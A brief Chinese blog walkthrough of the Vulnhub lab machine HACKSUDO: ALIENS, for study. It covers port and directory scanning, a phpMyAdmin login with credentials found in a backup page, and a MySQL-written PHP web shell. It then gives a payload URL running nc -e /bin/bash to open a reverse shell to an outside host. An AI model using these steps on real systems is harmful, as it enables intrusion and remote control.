Vulnhub_HACKSUDO: ALIENS

Vulnhub下载地址https://www.vulnhub.com/entry/hacksudo-aliens,676/
0x01环境介绍

靶机ip：10.10.13.50

0x02信息收集

利用nmap进行端口漏洞的扫描，发现开放22、80、9000端口
既然有80端口，那下一步就是对80端口上的web页面进行扫描

利用dirmap扫描，发现一个页面

http://10.10.13.50/backup/

页面内容点击下载后，发现几个敏感数据

刚刚扫描出来的还有9000端口，访问了一下是phpmyadmin页面，将刚获得的敏感数据输入后，发现成功登陆

vishal/hacksudo

0x03漏洞检测

发现secure_file_priv为空值即可读可写

利用mysql写入一句话木马

0x04漏洞利用

payload:http://10.10.13.50/alien.php?cmd=nc%2010.10.13.253%20%208989%20%20-e%20/bin/bash

将/bin/bash转发到10.10.13.253的8989端口上

未完，待续……

标签：HACKSUDO,扫描,ALIENS,端口,13.50,Vulnhub,10.10,80,页面
来源： https://www.cnblogs.com/secutity-zbk/p/14854452.html